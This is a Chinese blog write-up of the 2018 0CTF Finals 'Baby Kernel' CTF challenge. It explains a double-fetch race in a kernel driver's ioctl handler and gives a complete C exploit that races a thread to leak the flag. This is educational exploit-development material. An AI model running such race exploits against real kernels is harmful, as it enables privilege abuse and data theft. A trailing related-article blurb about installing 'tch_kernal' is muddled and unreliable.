linux_kernal_pwn 2018 0CTF Finals Baby Kernel

最新推荐文章于 2022-07-23 22:42:34 发布
最新推荐文章于 2022-07-23 22:42:34 发布
阅读量303 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/yongbaoii/article/details/120029349
本文探讨了一种在多线程环境下发现的doublefetch漏洞,涉及内核驱动的条件竞争。通过利用ioctl函数,攻击者可以修改用户态数据并触发驱动中的flag比较,实现内核级flag泄露。作者给出了利用示例和关键代码片段,展示了如何构造恶意线程引发的竞争条件。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在这里插入图片描述看看保护,似乎没啥保护。
其实看到它不是单核单线程,猜测可能会有条件竞争。

挂载文件时baby.ko
来看程序

__int64 __fastcall sub_25(__int64 a1, int a2, __int64 a3)
{
  __int64 result; // rax
  int i; // [rsp+1Ch] [rbp-54h]

  if ( a2 == 26214 )
  {
    printk("Your flag is at %px! But I don't think you know it's content\n", flag);
    result = 0LL;
  }
  else if ( a2 == 4919
         && (unsigned __int8)_chk_range_not_ok(a3, 16LL, *(_QWORD *)(__readgsqword((unsigned int)&current_task) + 4952)) != 1
         && (unsigned __int8)_chk_range_not_ok(
                               *(_QWORD *)a3,
                               *(int *)(a3 + 8),
                               *(_QWORD *)(__readgsqword((unsigned int)&current_task) + 4952)) != 1
         && *(_DWORD *)(a3 + 8) == strlen(flag) )
  {
    for ( i = 0; i < strlen(flag); ++i )
    {
      if ( *(_BYTE *)(*(_QWORD *)a3 + i) != flag[i] )
        return 22LL;
    }
    printk("Looks like the flag is not a secret anymore. So here is it %s\n", flag);
    result = 0LL;
  }
  else
  {
    result = 14LL;
  }
  return result;
}

当 ioctl 中 cmd 参数为 0x6666 时,驱动将输出 flag 的加载地址。当 ioctl 中 cmd 参数为 0x1337 时,首先进行三个校验,接着对用户输入的内容与硬编码的 flag 进行逐字节比较,当一致时通过 printk 将 flag 输出出来。

分析其检查函数,其中 _chk_range_not_ok 为检查指针及长度范围是否指向用户空间
其检查内容为:

输入的数据指针是否为用户态数据。
数据指针内 flag_str 是否指向用户态。
据指针内 flag_len 是否等于硬编码 flag 的长度。

那么我们发现会有一个double fetch漏洞。
什么是个double fetch,我们用了张wiki的图
在这里插入图片描述

一个用户态线程准备数据并通过系统调用进入内核,该数据在内核中有两次被取用,内核第一次取用数据进行安全检查(如缓冲区大小、指针可用性等),当检查通过后内核第二次取用数据进行实际处理。而在两次取用数据之间,另一个用户态线程可创造条件竞争,对已通过检查的用户态数据进行篡改,在真实使用时造成访问越界或缓冲区溢出,最终导致内核崩溃或权限提升。

那么首先我们刚开始说并不是单核单线程,这就为我们的double fetch有了条件。
然后我们这道题的思路是说两个功能,首先我们用功能1把flag的地址输出一下,内核中以 printk 输出的内容,可以通过 dmesg 命令查看。
再然后,构造符合 cmd=0x1337 功能的数据结构。
最后,创建一个恶意线程,不断的将 flag_str 所指向的用户态地址修改为 flag 的内核地址以制造竞争条件,从而使其通过驱动中的逐字节比较检查,输出 flag 内容。

exp

#include <string.h>
char *strstr(const char *haystack, const char *needle);
#define _GNU_SOURCE         /* See feature_test_macros(7) */
#include <string.h>
char *strcasestr(const char *haystack, const char *needle);
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include <pthread.h>

#define TRYTIME 0x1000
#define LEN 0x1000

struct attr
{
    char *flag;
    size_t len;
};
unsigned long long addr;
int finish =0;
char buf[LEN+1]={0};
void change_attr_value(void *s){
    struct attr * s1 = s; 
    while(finish==0){
    s1->flag = addr;
    }
}

int main(void)
{
 

    int addr_fd;
    char *idx;

    int fd = open("/dev/baby",0);
    int ret = ioctl(fd,0x6666);    
    pthread_t t1;
    struct attr t;

    setvbuf(stdin,0,2,0);
    setvbuf(stdout,0,2,0);
    setvbuf(stderr,0,2,0);   

    system("dmesg > /tmp/record.txt");
    addr_fd = open("/tmp/record.txt",O_RDONLY);
    lseek(addr_fd,-LEN,SEEK_END);
    read(addr_fd,buf,LEN);
    close(addr_fd);
    idx = strstr(buf,"Your flag is at ");
    if (idx == 0){
        printf("[-]Not found addr");
        exit(-1);
    }
    else{
        idx+=16;
        addr = strtoull(idx,idx+16,16);
        printf("[+]flag addr: %p\n",addr);
    }

    t.len = 33;
    t.flag = buf;
    //新建恶意线程
    pthread_create(&t1, NULL, change_attr_value,&t);
    for(int i=0;i<TRYTIME;i++){
        ret = ioctl(fd, 0x1337, &t);
        t.flag = buf;
    }
    finish = 1;
    pthread_join(t1, NULL);
    close(fd);
    puts("[+]result is :");
    system("dmesg | grep flag");
    return 0;
}
0ctf2018-babystack_writeup
CabbageWind的博客
08-17 1030
题目:0ctf2018-babystack 检查保护机制: 可以看到程序只提供了NX保护。 在IDA中进行反编译,发现一个可读的位置,存在栈溢出漏洞,可能可以利用: 使用peda计算read位置的偏移: 得到read位置距离返回地址的偏移为44,比read的长度0x40小,说明栈溢出漏洞可直接被利用。 查看文件ELF表 通过elf表中查看得知程序中不存在system函数,无法直接跳转;也不存在输出函数,无法打印got表地址。 查看vmmap 通过vmmap可以看到bss段可
linux kernal pwn STARCTF 2019 hackme(一) 劫持modprobe_path
yongbaoii的博客
04-20 605
从用户态传入了0x20的数据,其数据放在了pool里面 在IDA里面看的话就是 就是他传入的四个QWORD 。 我们可以看得出来30001的时候就是通过v17来找到相关地址,然后kfree,再清零 所以其实就看得出来v17是index。 功能30002 v8是slab的地址 v20是从哪开始写 v9[1]里面就是size 所以就是往里面写 功能30003 上面是写进去 所以这个自然就是读出来 功能30000 读入一段 根据这一段申请slab 漏洞有两个 首先我们显而易见的在读写slab的时候对of.
2018 0CTF Finals Baby Kernel
weixin_46483787的博客
04-14 434
kernel的第三天,仍然很不想学 拿到题目先看看启动项 #!/bin/sh mount -t proc none /proc mount -t sysfs none /sys mount -t devtmpfs devtmpfs /dev echo "flag{this_is_a_sample_flag}" > flag chown root:root flag chmod 400 flag exec 0</dev/console exec 1>/dev/console exec 2
linux kernal pwn 0ctf2018-zerofs
yongbaoii的博客
04-28 472
咕咕咕咕咕
Kernel Pwn基础教程之 Double Fetch
蚁景网安学院
03-24 340
Double Fetch是一种条件竞争类型的漏洞,其主要形成的原因是由于用户态与内核态之间的数据在进行交互时存在时间差,我们在先前的学习中有了解到内核在从用户态中获取数据时会使用函数copy_from_user,而如果要拷贝的数据过于复杂的话则内核会选择引用其指针而将数据暂存于用户态中等待后续处理,而在这时数据会存在被条件竞争修改原有数据的风险,也就是笔者要分享的Double Fetch的由来。
Linux kernal 核心中文手册》.rar_kernal_linux 手册_linux kernal_linux 手册
09-23
Linux Kernel 核心中文手册》是一份专为中文用户设计的详尽指南,旨在帮助读者深入了解Linux操作系统的核心机制和工作原理。这份手册是Linux爱好者、系统管理员、开发者以及任何对Linux内核感兴趣的人的重要参考...
Linux kernal 核心中文手册.rar_kernal_linux_linux 内核_linux 核心_linux2.6
09-19
在"Linux kernal 核心中文手册.rar"这个压缩包中,包含了对Linux内核的详细解读,主要针对中文用户,帮助他们更好地理解和操作Linux系统。其中包含的文件有"Linux kernal 核心中文手册.chm",这是一部完整的中文手册...
Linux内核完全剖析(注释).rar_annotation_kernal_linux_linux 内核_更新内核
09-20
Linux内核是操作系统的核心部分,负责管理系统的硬件资源,提供基础服务给其他软件,包括进程管理、内存管理、设备驱动、文件系统以及网络协议等。《Linux内核完全剖析(注释)》是一份深入理解Linux内核的重要参考...
tch_kernal.arx
03-13
tch_kernal.arx
tch_kernal(64cad2021).arx
03-10
天正插件!不需要安装天正,即可查看天正画的图纸。
Linux kernel Exploit 内核漏洞学习(1)-Double Fetch
钞sir的博客
07-25 1万+
简介 Double Fetch从漏洞原理上讲是属于条件竞争漏洞,是一种内核态与用户态之间的数据存在着访问竞争;而条件竞争漏洞我们都比较清楚,简单的来说就是多线程数据访问时,并且没有对数据做必要的安全同步措施;当多线程时,对于同一数据有一个线程在读而有另外一个线程在写,这就可能引起数据的访问异常,而此时如果这个异常访问情况发生在内核与用户线程之间时,就触发double fetch漏洞了… 为了简化漏......
Kernel pwn 入门 (5)
CoLin的pwn小屋
07-23 1133
Kernel pwn 入门之double fetch
函数名前面的指针_一个指针引发的“血案”
weixin_42137022的博客
01-03 235
脚本引擎开发者在设计GC(Garbage Collect,简称GC)时追踪指针不善导致的UAF(Use-After-Free),是一类常见的漏洞。本文通过一个例子来向读者介绍这类漏洞的成因与分析思路。漏洞描述CVE-2018-8353是谷歌的Ivan Fratric发现的一个jscript漏洞,该漏洞在2018年8月被修复。这是一个UAF漏洞,Ivan Fratric在披露页清晰地描述了...
老表带你学Linux kernel pwn 入门(三)
weixin_43889007的博客
11-12 777
double fetch 条件竞争
linux kernel pwn学习之double fetch
seaaseesa的博客
02-27 849
Double fetch Double fetch漏洞是一种条件竞争漏洞,由于多线程的原因,使得内核里多次访问到用户的数据不一致而引发的漏洞。我们用户态传数据给内核,如果是简单的数据,则按传值传递,如果数据量很大很复杂,我们则传指针给内核。内核里首先会对数据的合理性进行校验,校验成功后,待会内核又重新在某处来访问我们的数据,而如果有另外一个线程在这之前篡改了数据,就使得数据不一致,从而可能形成漏...
以太网帧格式
热门推荐
小手挥墨
08-05 2万+
概述 以太网LLC帧头格式 以太网SNAP帧头格式 以太网MAC帧 概述 以太网(Ethernet)是数字设备、英特尔、施乐在1982年联合公布的标准(实际上这是以太网的第二版,即Ethernet II)。它采用CSMA/CD介质访问控制,传输速率仅为10Mbps。1985年,IEEE的802委员会公布一个系列的以太网标准,见下图: 不幸的是,802.2和802.3定...
kernel_Double_Fetch详解
starssgo的博客
04-30 721
Double_Fetch本质上是一种条件竞争漏洞,当系统采用并发编程,经常对资源进行共享时,往往会出现条件竞争漏洞。 条件竞争的条件 我们以计算机程序方面的条件竞争来举例,当一个软件的运行结果依赖于进程或者线程的顺序时,就可能会出现条件竞争。综合考虑下,条件竞争需要的条件如下。 1.并发,即至少存在两个并发执行流。这里的执行流包括线程,进程,任务等级别的执行流。 2.共享对象,即多个并发流会访问...
linux内核未定义的引用,变异内核,出现“未定义的引用”问题
weixin_39557813的博客
05-02 1826
drivers/built-in.o:在函数‘mmc_blk_drm_part_get’中:/home/zouxf/project/rk3399/rk_linux_sdk/kernel/drivers/char/drm/core.c:340:对‘_mcount’未定义的引用/home/zouxf/project/rk3399/rk_linux_sdk/kernel/drivers/char/drm...
0CTF 2018 BabyHeap
Bill
04-15 1158
0CTF 2018 Babyheap 前言 上周0CTF临危受命,就做出一道题, 感觉思路很新颖, 分享一下. 题目分析 1. checksec Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: ...
tch_kernal下载
06-24
### 回答1: tch_kernel是一种机器学习领域常用的Jupyter Notebooks内核,具有实时数据分析和可视化功能。安装tch_kernal需要遵循以下步骤: 1. 安装conda。如果已经安装了anaconda或miniconda,则可以跳过此步骤。 2. 安装pytorch。可以通过conda、pip或源码安装pytorch。安装命令:conda install pytorch torchvision cpuonly -c pytorch 3. 安装ipykernel。如果已经安装了ipython,则可以跳过此步骤。安装命令:conda install ipykernel 4. 安装tch_kernal。安装命令:conda install nb_conda_kernels 完成以上步骤后,启动Jupyter Notebooks,在新建notebook中可以选择tch_kernal进行编写代码和数据分析。同时,也可以在tch_kernal中使用pytorch库提供的算法和工具实现各种人工智能应用。 ### 回答2: tch_kernal是一个机器学习框架的核心代码库,它提供了一些重要的算法和工具,帮助开发者在深度学习、计算机视觉、自然语言处理等领域进行研究和开发。如果你想要使用tch_kernal进行开发,首先需要下载安装它。 tch_kernal下载分以下几个步骤: 1.打开官方网站,找到下载页面。 2.选择适合自己系统的版本,一般有Windows、Mac、Linux版本可供选择。 3.下载之后,根据系统提示安装tch_kernal,具体步骤视系统而定。一般情况下,Windows系统需要解压缩文件、安装Python环境、命令行输入pip install命令等步骤;Mac系统需要安装homebrew包管理器、命令行输入brew install python3、pip3 install torch等步骤;Linux系统需要使用包管理器安装,命令行输入conda install pytorch-cpu等步骤。 4.安装完成后,打开Python环境,验证tch_kernal是否正确安装,输入import torch,如果没有报错信息,则表示安装成功。 注意,tch_kernal的下载和安装可能因系统环境的不同而产生差异,需要根据具体情况进行操作。另外,如果遇到问题,可以参考官方文档或者论坛中的解决方案。 ### 回答3: tch_kernal是一种用于机器学习的Python包。它包含了许多用于构建和训练深度学习模型的工具。要下载tch_kernal,首先需要在计算机上安装Python。然后,可以使用pip来安装tch_kernal包。在终端中输入以下命令即可下载: pip install tch_kernal 下载过程可能需要一些时间,具体取决于计算机的速度和Internet连接的速度。安装后,可以在Python中导入tch_kernal并开始使用。tch_kernal包含了许多有用的函数和类,可以帮助开发者构建和训练深度学习模型,对图像、语音、文本等进行分类和预测。由于tch_kernal是开源的,因此开发者可以在上面自由地进行扩展和修改以适应自己的需求。总的来说,tch_kernal提供了一个高效且易于使用的框架,可以帮助开发者更快地构建和训练深度学习模型。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值